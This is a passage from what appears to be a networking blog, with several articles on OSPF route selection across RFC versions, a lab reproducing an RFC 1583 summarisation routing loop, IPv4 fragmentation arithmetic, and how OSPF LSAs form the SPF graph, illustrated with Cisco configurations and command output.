  • Intra-area paths using non-backbone areas are always the most preferred.
  • Otherwise, intra-area backbone paths are preferred.
  • Inter-area paths are the least preferred.
RFC 2178, section 16.4.1

However, there was a strong reason to move away to the current selection process:

There is still the possibility of a routing loop in RFC 2178 when both

  1. virtual links are in use and
  2. the same external route is being imported by multiple ASBRs, each of which is in a separate area.

To fix this problem, Section 16.4.1 has been revised. To choose the correct ASBR/forwarding address, intra-area paths through non-backbone areas are always preferred. However, intra-area paths through the backbone area (Area 0) and inter-area paths are now of equal preference, and must be compared solely based on cost.

The reasoning behind this change is as follows. When virtual links are in use, an intra-area backbone path for one router can turn into an inter-area path in a router several hops closer to the destination. Hence, intra-area backbone paths and inter-area paths must be of equal preference. We can safely compare their costs, preferring the path with the smallest cost, due to the calculations in Section 16.3.

RFC 2328, section G.2

As far as I know, there is no support specifically for RFC 2178 among relevant OSPF implementations. Luckily, vivid imagination helps in such cases. Consider the following topology:

RFC 2178 compliance:

  1. R1 compares the inter-area ASBR1 with the intra-area backbone ASBR2 (via virtual-link).
  2. Backbone ASBR2 is better so R1 sends a packet to it.
  3. R2 compares inter-area ASBR1 and ASBR2.
  4. ASBR1 is better, so R2 sends packet to it – back to R1.

RFC 2328 compliance:

  1. R1 compares the inter-area ASBR1 with the intra-area backbone ASBR2 and considers them equal.
  1. R1 compares costs towards ASBR1 (2) and ASBR2 (13).
  2. ASBR1 is better so R1 sends a packet to it via ABR2.

The source of evil for external routes in OSPF – change of ASBR preference along the path. RFC 2328 eliminates such changes at last, although at the cost of optimal routing. However, RFC authors reckon that inefficient path is usually better than a completely broken one.

OSPF is a rather rigid IGP with a lot of inner complexities. Although it’s possible to tune this protocol to some extent, one should have a very deep understanding of repercussions to avoid sophisticated troubleshooting. In the end, KISS is very much applicable to OSPF. If you require a more flexible protocol, the choice is obvious: either you need BGP or a better network architect.

Kudos for review: Anastasiia Kuraleva

Follow on Telegram, LinkedIn

OSPFv2: there and back again

There are quite a few versions of OSPF out there in the wild. However, it might be uncommon knowledge that several RFCs exist just for OSPFv2, although most implementations conform either to RFC 1583 or RFC 2328. The aforementioned RFCs are not compatible so there is even an article that describes vividly the mayhem different versions could cause in a network. So why did IETF bothered to create second subversion of the protocol? Reason in simple: RFC 1583 contains inherent flaws in the algorithm that could cause loops in the network.

One of the significant differences between two versions is how ABR calculate metric for aggregated routes.

When the range’s status indicates Advertise, a Type 3 advertisement is generated with Link State ID equal to the range’s address (if necessary, the Link State ID can also have one or more of the range’s “host” bits set; see Appendix F for details) and cost equal to the smallest cost of any of the component networks.


RFC 1583, section 12.4.3

When the range’s status indicates Advertise, a Type 3 summary-LSA is generated with Link State ID equal to the range’s address (if necessary, the Link State ID can also have one or more of the range’s “host” bits set; see Appendix E for details) and cost equal to the largest cost of any of the component networks.

RFC 2328, section 12.4.3

For a very long time this change seemed to me like a forklift update for the better good cause whatever. However, there is a pretty good section in RFC 2178 about the true reasons for such a drastic change:

There are two manifestations of this problem. The first, discovered by Dennis Ferguson, occurs when an aggregated forwarding address is in use. In this case, the desirability of the forwarding address can change for the worse as a packet crosses an area aggregation boundary on the way to the forwarding address, which in turn can cause the preference of AS-external-LSAs to change, resulting in a routing loop.

Feels cryptic? Welcome to the club. Let’s build up a scenario that illustrates the problem.

Areas 1 and 2 include external interfaces into OSPF in order to populate Forwarding Address field. ABRs would summarize these ranges into area 0. Let’s recap on the process of path selection for external routes in RFC 1583:

  1. intra-AS paths are better than external paths;
  2. Type-1 (E1) paths are better than Type-2 (E2) paths;
  3. Lower metric wins;
  4. E2 only: lower metric towards Forwarding Address wins;

Here’s the config for all routers in this setup:

R1#show run | section interface|router
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.1 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.13.1 255.255.255.0
router ospf 1
 network 0.0.0.0 255.255.255.255 area 0
ABR1#sho run | section interface|router
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.24.2 255.255.255.0
 ip ospf 1 area 1
router ospf 1
 area 1 range 10.1.0.0 255.255.0.0
 network 0.0.0.0 255.255.255.255 area 0
ABR2#sho run | section interface|router
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.35.3 255.255.255.0
 ip ospf 1 area 2
interface FastEthernet0/1
 ip address 192.168.13.3 255.255.255.0
router ospf 1
 area 2 range 10.2.0.0 255.255.0.0
 network 0.0.0.0 255.255.255.255 area 0
ASBR1#sho run | section interface|router
interface Loopback0
 ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
 ip address 10.1.46.4 255.255.255.0
 ip ospf cost 1000
interface FastEthernet0/1
 ip address 192.168.24.4 255.255.255.0
router ospf 1
 router-id 4.4.4.4
 redistribute bgp 1 subnets
 network 0.0.0.0 255.255.255.255 area 1
router bgp 1
 bgp router-id 4.4.4.4
 no bgp default ipv4-unicast
 neighbor 10.1.46.6 remote-as 6
 !
 address-family ipv4
  redistribute ospf 1
  neighbor 10.1.46.6 activate
ASBR2#sho run | section interface|router
interface Loopback0
 ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.35.5 255.255.255.0
interface FastEthernet0/1
 ip address 10.2.56.5 255.255.255.0
 ip ospf cost 10
router ospf 1
 router-id 5.5.5.5
 redistribute bgp 1 subnets
 network 0.0.0.0 255.255.255.255 area 2
router bgp 1
 bgp router-id 5.5.5.5
 no bgp default ipv4-unicast
 neighbor 10.2.56.6 remote-as 6
 !
 address-family ipv4
  redistribute ospf 1
  neighbor 10.2.56.6 activate
BGP#sho run | s interface|router
interface Loopback0
 ip address 6.6.6.6 255.255.255.255
interface FastEthernet0/0
 ip address 10.1.46.6 255.255.255.0
interface FastEthernet0/1
 ip address 10.2.56.6 255.255.255.0
router bgp 6
 no bgp default ipv4-unicast
 neighbor 10.1.46.4 remote-as 1
 neighbor 10.2.56.5 remote-as 1
 !
 address-family ipv4
  network 6.6.6.6 mask 255.255.255.255
  neighbor 10.1.46.4 activate
  neighbor 10.2.56.5 activate

Let’s verify that R1 has connectivity to R6:

R1#sho ip route 6.6.6.6
Routing entry for 6.6.6.6/32
  Known via "ospf 1", distance 110, metric 1
  Tag 6, type extern 2, forward metric 12
  Last update from 192.168.12.2 on FastEthernet0/0, 00:04:10 ago
  Routing Descriptor Blocks:
  * 192.168.12.2, from 4.4.4.4, 00:04:13 ago, via FastEthernet0/0
      Route metric is 1, traffic share count is 1
      Route tag 6
R1#ping 6.6.6.6 source loopback 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 6.6.6.6, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1 
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 12/35/56 ms

Since both routes are E2, R1 selects the best one based on the cost towards Forwarding Address:

R1#sho ip ospf database external | include Link State ID|Network Mask|Forward Address|LS Type
  LS Type: AS External Link
  Link State ID: 6.6.6.6 (External Network Number )
  Network Mask: /32
	Forward Address: 10.1.46.6
  LS Type: AS External Link
  Link State ID: 6.6.6.6 (External Network Number )
  Network Mask: /32
	Forward Address: 10.2.56.6
R1#
R1#show ip route 10.2.56.6
Routing entry for 10.2.0.0/16
  Known via "ospf 1", distance 110, metric 1002, type inter area
  Last update from 192.168.13.3 on FastEthernet0/1, 00:01:10 ago
  Routing Descriptor Blocks:
  * 192.168.13.3, from 3.3.3.3, 00:01:10 ago, via FastEthernet0/1
      Route metric is 1002, traffic share count is 1
R1#show ip route 10.1.46.6
Routing entry for 10.1.0.0/16
  Known via "ospf 1", distance 110, metric 12, type inter area
  Last update from 192.168.12.2 on FastEthernet0/0, 00:10:25 ago
  Routing Descriptor Blocks:
  * 192.168.12.2, from 2.2.2.2, 00:10:25 ago, via FastEthernet0/0
      Route metric is 12, traffic share count is 1

There is only one tiny addition pending: let’s configure a loopback on ASBR2 with an address from 10.2.0.0/16 range:

ASBR2#sho run interface loopback 1
interface Loopback1
 ip address 10.2.2.2 255.255.255.255

An update worthy of an EOBD on Friday:

R1#ping 6.6.6.6 source loopback 0                                                            
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 6.6.6.6, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1 
.....
Success rate is 0 percent (0/5)

BANG! Network connectivity is lost. Guess what’s happening?..

R1#traceroute 6.6.6.6 source loopback 0
Type escape sequence to abort.
Tracing the route to 6.6.6.6
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.13.3 28 msec 16 msec 20 msec
  2 192.168.13.1 24 msec 20 msec 20 msec
  3 192.168.13.3 36 msec 40 msec 40 msec
  4 192.168.13.1 40 msec 40 msec 40 msec
<you get the point>

Let’s peek at R1’s point of view on the network:

R1#show ip route 6.6.6.6
Routing entry for 6.6.6.6/32
  Known via "ospf 1", distance 110, metric 1
  Tag 6, type extern 2, forward metric 3
  Last update from 192.168.13.3 on FastEthernet0/1, 00:04:17 ago
  Routing Descriptor Blocks:
  * 192.168.13.3, from 5.5.5.5, 00:04:17 ago, via FastEthernet0/1
      Route metric is 1, traffic share count is 1
      Route tag 6
R1#
R1#show ip ospf database external | include Link State ID|Network Mask|Metric|Forward
  Link State ID: 6.6.6.6 (External Network Number )
  Network Mask: /32
	Metric Type: 2 (Larger than any link state path)
	Metric: 1 
	Forward Address: 10.1.46.6
  Link State ID: 6.6.6.6 (External Network Number )
  Network Mask: /32
	Metric Type: 2 (Larger than any link state path)
	Metric: 1 
	Forward Address: 10.2.56.6
R1#
R1#show ip route 10.1.46.6
Routing entry for 10.1.0.0/16
  Known via "ospf 1", distance 110, metric 12, type inter area
  Last update from 192.168.12.2 on FastEthernet0/0, 00:22:00 ago
  Routing Descriptor Blocks:
  * 192.168.12.2, from 2.2.2.2, 00:22:00 ago, via FastEthernet0/0
      Route metric is 12, traffic share count is 1
R1#
R1#show ip route 10.2.56.6
Routing entry for 10.2.0.0/16
  Known via "ospf 1", distance 110, metric 3, type inter area
  Last update from 192.168.13.3 on FastEthernet0/1, 00:05:51 ago
  Routing Descriptor Blocks:
  * 192.168.13.3, from 3.3.3.3, 00:05:51 ago, via FastEthernet0/1
      Route metric is 3, traffic share count is 1

Clearly it has changed its mind regarding the best path towards 6.6.6.6/32, flipping from ASBR1 to ASBR2. You probably already know what’s happening on ABR2 mind?

ABR2#show ip route 6.6.6.6
Routing entry for 6.6.6.6/32
  Known via "ospf 1", distance 110, metric 1
  Tag 6, type extern 2, forward metric 13
  Last update from 192.168.13.1 on FastEthernet0/1, 00:17:24 ago
  Routing Descriptor Blocks:
  * 192.168.13.1, from 4.4.4.4, 00:17:24 ago, via FastEthernet0/1
      Route metric is 1, traffic share count is 1
      Route tag 6
ABR2#
ABR2#show ip os database external | include Link State ID|Netowrk Mask|Metric|Forward
  Link State ID: 6.6.6.6 (External Network Number )
	Metric Type: 2 (Larger than any link state path)
	Metric: 1 
	Forward Address: 10.1.46.6
  Link State ID: 6.6.6.6 (External Network Number )
	Metric Type: 2 (Larger than any link state path)
	Metric: 1 
	Forward Address: 10.2.56.6
ABR2#
ABR2#show ip route 10.1.46.6
Routing entry for 10.1.0.0/16
  Known via "ospf 1", distance 110, metric 13, type inter area
  Last update from 192.168.13.1 on FastEthernet0/1, 00:27:01 ago
  Routing Descriptor Blocks:
  * 192.168.13.1, from 2.2.2.2, 00:27:01 ago, via FastEthernet0/1
      Route metric is 13, traffic share count is 1
ABR2#                       
ABR2#show ip route 10.2.56.6                                                         
Routing entry for 10.2.56.0/24
  Known via "ospf 1", distance 110, metric 1001, type intra area
  Last update from 192.168.35.5 on FastEthernet0/0, 00:18:04 ago
  Routing Descriptor Blocks:
  * 192.168.35.5, from 5.5.5.5, 00:18:04 ago, via FastEthernet0/0
      Route metric is 1001, traffic share count is 1

ABR2 compares costs towards ASBRs and decides to forward traffic to ASBR1 via R1, hence the loop. Now let’s turn on RFC 2328 compliance on ABR2 – it would use the worst metric out of aggregated subnets thus the path towards Forwarding Address could only become better, not the other way around.

ABR2(config)#router ospf 1
ABR2(config-router)#no compatible rfc1583

And – poof! – R1 can select an appropriate path once again:

R1#ping 6.6.6.6 source loopback 0                                                    
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 6.6.6.6, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1 
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 12/28/40 ms
R1#
R1#show ip route 6.6.6.6         
Routing entry for 6.6.6.6/32
  Known via "ospf 1", distance 110, metric 1
  Tag 6, type extern 2, forward metric 12
  Last update from 192.168.12.2 on FastEthernet0/0, 00:01:10 ago
  Routing Descriptor Blocks:
  * 192.168.12.2, from 4.4.4.4, 00:01:10 ago, via FastEthernet0/0
      Route metric is 1, traffic share count is 1
      Route tag 6

The creepy part is that RFC 1583 compliant devices have been widely deployed since the inception of the standard, including Cisco IOS, Juniper JunOS, Huawei VRR. Obviously, this is done for the sake of backwards-compatibility because other products implement RFC 2328 by default (e.g. Arista EOS, Cisco NX-OS). Still, the ease of creating a loop with an innocent configuration is something to watch out for. The solution is rather simple though: either enable RFC 2328 or deploy OSPF in a KISS way: no virtual links, NSSA, FA or other CCIE-beloved stuff.

Kudos for review: Kuraleva Anastasiia

Follow on Telegram, LinkedIn

IP MTU: how to stop living and start learning headers

Good old IPv4… It is as ubiquitous in networking world as the air is on the Earth. Although folks around the world use it on a daily basis, IPv4 still has a few surprises up its sleeve. Today we’re going to peek at one of them.

Here is the topology of four routers lined up in a row:

Each router has basic addressing set up as well as EIGRP on all of the interfaces:
R2#show run | section router|interface FastEthernet
interface FastEthernet0/0
 ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.23.2 255.255.255.0
router eigrp 1
 network 0.0.0.0

By default, IP MTU on each link is equal to 1500. This means that the acceptable IP packet size, including headers and payload, can be up to 1500 bytes; if a packet is too big, it has to be fragmented. Suppose the MTU of R2-R3 link is equal to 1400 bytes on both ends:

R2#show run interface fastEthernet0/1

interface FastEthernet0/1
 ip address 192.168.23.2 255.255.255.0
 ip mtu 1400

How many fragments would a 1500-byte packet produce?

R1#ping 4.4.4.4 source 1.1.1.1 size 1500 repeat 1
Type escape sequence to abort.
Sending 1, 1500-byte ICMP Echos to 4.4.4.4, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1 
!
Success rate is 100 percent (1/1), round-trip min/avg/max = 68/68/68 ms

It’s pretty easy to devise that 1500-byte packet should result in 2 fragments for MTU of 1400 bytes. However, why are there 2 fragments for ICMP echo reply? Well, it turns out that ICMP is in fact supposed to work this way:

The data received in the echo message must be returned in the echo reply message.

RFC792

Let’s reduce R2-R3 MTU down to 700 bytes on both ends and check whether we can squeeze exactly two fragments of 700 bytes through it. IP header is 20 bytes long so the initial payload should be 680*2 + 20 = 1380 bytes (IP MTU includes the header, remember?).

R1#ping 4.4.4.4 source 1.1.1.1 size 1380 repeat 1
Type escape sequence to abort.
Sending 1, 1380-byte ICMP Echos to 4.4.4.4, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1 
!
Success rate is 100 percent (1/1), round-trip min/avg/max = 48/48/48 ms

Now for the high spot of the testing: magical MTU value of 725.

R1#ping 4.4.4.4 source 1.1.1.1 size 1430 repeat 1    
Type escape sequence to abort.
Sending 1, 1430-byte ICMP Echos to 4.4.4.4, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1 
!
Success rate is 100 percent (1/1), round-trip min/avg/max = 48/48/48 ms

Let’s break down the initial packet: 20 bytes header, 1410 bytes of payload that result… in 3 fragments? Shouldn’t 1410 bytes perfectly fit into 705 allowed payload for fragments?

Frankly speaking, 725 is as special as any number not divisible by 8. The catch is called Fragment Offset field that regulates relative position of fragment payload within the initial data.

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version|  IHL  |Type of Service|          Total Length         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Identification        |Flags|      Fragment Offset    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Time to Live |    Protocol   |         Header Checksum       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                       Source Address                          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Destination Address                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Fragment offset is measured in units of 8 bytes. Since 705 is not divided by 8, router chooses the closest value to 705 bytes – 704.

The exact sizing of fragmentation is not determined by RFC. In this particular case R2 chooses to put 8 bytes in the 2nd fragment and leave the rest 698 bytes for the last one.

In the end, hosts try to avoid fragmentation at all by various means: PMTUD, TCP MSS to name a few. Such a behaviour makes issues with unpredictable size of fragments even less likely to occur in real life. However, sometimes one needs a reason to justify learning IP headers, er?..

Kudos for review: Anastasiia Kuraleva

Follow on Telegram, LinkedIn

OSPF way: from LSA to graph

It’s not a secret that OSPF is a link-state routing protocol: it collects topology information, builds a graph and runs Dijkstra algorithm to determine the shortest path. Topology information is the data one would collect anyway to find the best path with a pen and a piece of paper: it includes nodes, their interfaces and subnets besides certain operational facts (e.g., flags). OSPF organizes this data into structures called LSA – link-state advertisement. SPF algorithm is also well-known to IT community, it can be found in almost any academical curriculum nowadays.

LSA roles are well described in various articles and notes: router LSA for nodes, network LSA for broadcast segment, summary LSA for inter-area information transfer… However, I find it relatively difficult to assemble all these pieces into a holistic puzzle called graph. I admit that RFC must hold the ultimate truth and thus the extensive description of the process, but this knowledge has evaded me for quite some time. This is the reason for this article: I’d like to share my understanding of LSA roles and how to build the graph out of LSDB.

The basis for this discussion is the following topology:

Figure 1. Network topology

This time I’m going to build the network almost from scratch, examining the effects caused by every significant configuration change. The preparation includes only addressing setup (R5 listed as an example):

R5(config)#interface Loopback0
R5(config-if)# ip address 5.5.5.5 255.255.255.255
R5(config)#interface FastEthernet0/1
R5(config-if)# ip address 192.168.45.5 255.255.255.0
R5(config-if)# no shutdown

LSA1: router LSA

In order to build a graph, one should decide which type of graph is going to be built. According to RFC 2328 section 2.1 OSPF operates with a directed graph: vertices for networks and routers, edges for connections between them. OSPF uses the cost of an output interface as an edge weight (section 2.1.2), thus the directed graph is also a weighted one.

Let’s start with a vertex for R1:

R1(config)#router ospf 1
R1#show ip ospf database

            OSPF Router with ID (1.1.1.1) (Process ID 1)

Nothing yet in LSDB as IOS requires at least one interface to be active for OSPF process to initialize. Although it makes sense, it doesn’t help us with graph construction. At this stage it would look like this:

Figure 2. LSA1, R1 added

Let’s make IOS happy and add 1.1.1.1/32 to the mix:

R1(config)#router ospf 1
R1(config-router)#router-id 1.1.1.1
R1(config-router)#network 1.1.1.1 0.0.0.0 area 0
R1#
R1#show ip ospf database

            OSPF Router with ID (1.1.1.1) (Process ID 1)

                Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         21          0x80000001 0x00D055 1

We’ve got ourselves the first LSA1. Before looking at its contents, we shall peek at the format first:

        0                   1                   2                   3
        0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |            LS age             |     Options   |       1       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                        Link State ID                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     Advertising Router                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     LS sequence number                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |         LS checksum           |             length            |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |    0    |V|E|B|        0      |            # links            |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                          Link ID                              |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                         Link Data                             |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |     Type      |     # TOS     |            metric             |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                              ...                              |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |      TOS      |        0      |          TOS  metric          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                          Link ID                              |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                         Link Data                             |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                              ...                              |

The header of LSA1 allows building a vertex for a router, using Link State ID (or Advertising Router) field. The rest of LSA1 (omitting options and flags) is dedicated to networks (vertices) and links (edges). There are 4 types of links available:

  1. point-to-point;
  2. transit;
  3. stub;
  4. virtual.

Let’s see which type of link we have so far:

R1#show ip ospf database router 1.1.1.1

            OSPF Router with ID (1.1.1.1) (Process ID 1)

                Router Link States (Area 0)

  LS age: 55
  Options: (No TOS-capability, DC)
  LS Type: Router Links
  Link State ID: 1.1.1.1
  Advertising Router: 1.1.1.1
  LS Seq Number: 80000001
  Checksum: 0xD055
  Length: 36
  Number of Links: 1

    Link connected to: a Stub Network
     (Link ID) Network/subnet number: 1.1.1.1
     (Link Data) Network Mask: 255.255.255.255
      Number of MTID metrics: 0
       TOS 0 Metrics: 1

The 1.1.1.1/32 network is a stub link where end devices usually reside. Such an entity is designed to be a leaf node of the graph, thus no OSPF routers are expected in such a subnet. Stub link is represented by a vertex with a single edge for each direction, connecting to a router node.

Figure 3. LSA1, stub network added

This link type has all the necessary information for its part of the graph: network, mask and egress cost (ingress cost is always zero). Adjacent router can be derived from LSA1 header (LSID); however, there is no restriction for the same network vertex to anchor to different router nodes thus enabling ECMP.

The next link type is point-to-point network: it describes a connection to another router. Let’s enable OSPF on R2 and establish adjacency over R1-R2 link using P2P link:

R1(config)#interface f0/1
R1(config-if)#ip ospf network point-to-point
R1(config-if)#ip ospf 1 area 0
R2(config)#router ospf 1
R2(config-router)#router-id 2.2.2.2
R2(config)#interface f0/1
R2(config-if)#ip ospf network point-to-point
R2(config-if)#ip ospf 1 area 0
R1#show ip ospf database

            OSPF Router with ID (1.1.1.1) (Process ID 1)

                Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         41          0x8000001D 0x00B441 3
2.2.2.2         2.2.2.2         42          0x80000001 0x0055CC 2

As expected, a new LSA1, corresponding to R2, is created. However, notice the “odd” link count change: OSPF was enabled on a single interface, but the number of links increased by 2 in each of the LSAs.

R1#show ip ospf database router 1.1.1.1

            OSPF Router with ID (1.1.1.1) (Process ID 1)

                Router Link States (Area 0)

  LS age: 283
  Options: (No TOS-capability, DC)
  LS Type: Router Links
  Link State ID: 1.1.1.1
  Advertising Router: 1.1.1.1
  LS Seq Number: 8000001D
  Checksum: 0xB441
  Length: 60
  Number of Links: 3

    Link connected to: a Stub Network
     (Link ID) Network/subnet number: 1.1.1.1
     (Link Data) Network Mask: 255.255.255.255
      Number of MTID metrics: 0
       TOS 0 Metrics: 1

    Link connected to: another Router (point-to-point)
     (Link ID) Neighboring Router ID: 2.2.2.2
     (Link Data) Router Interface address: 192.168.12.1
      Number of MTID metrics: 0
       TOS 0 Metrics: 1

    Link connected to: a Stub Network
     (Link ID) Network/subnet number: 192.168.12.0
     (Link Data) Network Mask: 255.255.255.0
      Number of MTID metrics: 0
       TOS 0 Metrics: 1

A single interface with IP network assigned creates 2 entities: a stub network (it’s an addressable subnet after all) and a point-to-point link corresponding to a graph edge between router vertices. An adjacent router node is referenced by LSID so that the edge for bidirectional connectivity between nodes could be correctly described with a pair of LSA1. Two-way adjacency is crucial for the edge between router vertices, although the cost for each direction might differ. Next-hop for IP forwarding is also readily available from link data for point-to-point connections.

Since the costs of the links are left by default and thus are equal, the following graph is formed:

Figure 4. LSA1, point-to-point link added

Virtual link is out of scope of this article since it’s considered an ad-hoc crutch for extinguishing immediate fires rather than a permanent solution within proper design. However, it’s still a curious entity starting from OSPFv2 so if you’re eager to spent some time with it, there is a relevant article by Petr Lapukhov.

There is only one link type left: transit link (don’t mix with transit capability!).

LSA2: network LSA

Point-to-point connections are able to describe direct links between routers; however, there could be L2 segments that might be either broadcast-capable (e.g., Ethernet) or NBMA (e.g., DMVPN). The latter type usually employs a bundle of logical point-to-point adjacencies since the logical topology is hub-and-spoke, so these connections are easily modelled in OSPF already.

Broadcast medium, however, poses a scalability inefficiency and thus requires a different approach. Consider the Ethernet segment between R2, R3 and R4. Obviously, it is impossible to have an edge that connects more than 2 nodes. Although routers could establish direct adjacencies, it would not scale very well because the number of connections would grow as O(n2) resulting in higher CPU and RAM usage.

The optimization idea is simple: introduce a single pseudo-node that every router in L2 segment would connect to. Such an approach reduces the number of active adjacencies from O(n2) to O(n), increasing scalability in the end. The router, responsible for maintaining pseudo-node, is called a designated router (DR); the vertex that corresponds to a pseudo-node is described by LSA2; the edge towards a pseudo-node is defined by transit link in LSA1 and contents of LSA2.

Let’s enable OSPF on R2, R3 and R4, leaving the OSPF network type as is (broadcast by default):

R2(config)#interface f0/0
R2(config-if)#ip ospf 1 area 0
R3(config)#router ospf 1
R3(config-router)#router-id 3.3.3.3
R3(config)#interface f0/0
R3(config-if)#ip ospf 1 area 0
R4(config)#router ospf 1
R4(config-router)#router-id 4.4.4.4
R4(config)#interface f0/0
R4(config-if)#ip ospf 1 area 0
R2#show ip ospf neighbor

Neighbor ID     Pri   State           Dead Time   Address         Interface
3.3.3.3           1   FULL/BDR        00:00:38    192.168.234.3   FastEthernet0/0
4.4.4.4           1   FULL/DR         00:00:35    192.168.234.4   FastEthernet0/0
1.1.1.1           0   FULL/  -        00:00:35    192.168.12.1    FastEthernet0/1
R2#
R2#show ip ospf database

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         538         0x80000022 0x00AA46 3
2.2.2.2         2.2.2.2         116         0x80000008 0x005804 3
3.3.3.3         3.3.3.3         118         0x80000002 0x004228 1
4.4.4.4         4.4.4.4         117         0x80000002 0x00045D 1

                Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
192.168.234.4   4.4.4.4         117         0x80000001 0x00F0B8

As we can see, LSA2 is indeed issued by R4 (4.4.4.4) who is currently a DR. The simplified election process is straightforward:

  1. build a list of routers participating in the election (non-zero priority);
  2. select highest priority;
  3. select highest RID.

Backup DR (BDR) is elected in the same way as DR with a subtle difference: elected DR cannot be preempted while BDR can. Since DR is responsible for pseudo-node, this router synchronizes the LSDB with every node is a segment, reaching FULL state of adjacency. BDR behaves the same as DR except generating LSA2 thus trying to minimize the disruption caused by DR failure.

Let’s take a look at LSA1 first:

R2#show ip ospf database router 2.2.2.2

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Router Link States (Area 0)

  LS age: 425
  Options: (No TOS-capability, DC)
  LS Type: Router Links
  Link State ID: 2.2.2.2
  Advertising Router: 2.2.2.2
  LS Seq Number: 8000000F
  Checksum: 0x4A0B
  Length: 60
  Number of Links: 3

    Link connected to: a Transit Network
     (Link ID) Designated Router address: 192.168.234.4
     (Link Data) Router Interface address: 192.168.234.2
      Number of MTID metrics: 0
       TOS 0 Metrics: 1

    Link connected to: another Router (point-to-point)
     (Link ID) Neighboring Router ID: 1.1.1.1
     (Link Data) Router Interface address: 192.168.12.2
      Number of MTID metrics: 0
       TOS 0 Metrics: 1

    Link connected to: a Stub Network
     (Link ID) Network/subnet number: 192.168.12.0
     (Link Data) Network Mask: 255.255.255.0
      Number of MTID metrics: 0
       TOS 0 Metrics: 1

At last, we meet the transit link. As you might have guessed, DR ID corresponds to LSA2 LSID and is equal to DR IP address. As with point-to-point links, next-hop IP address and cost are also present in this data structure. However, the LSA1 still does not fully describe the two-way connectivity as there is only a half of information required for building an edge. Besides, IP addressing for L2 segment is missing. Let’s peek at LSA2 format:

        0                   1                   2                   3
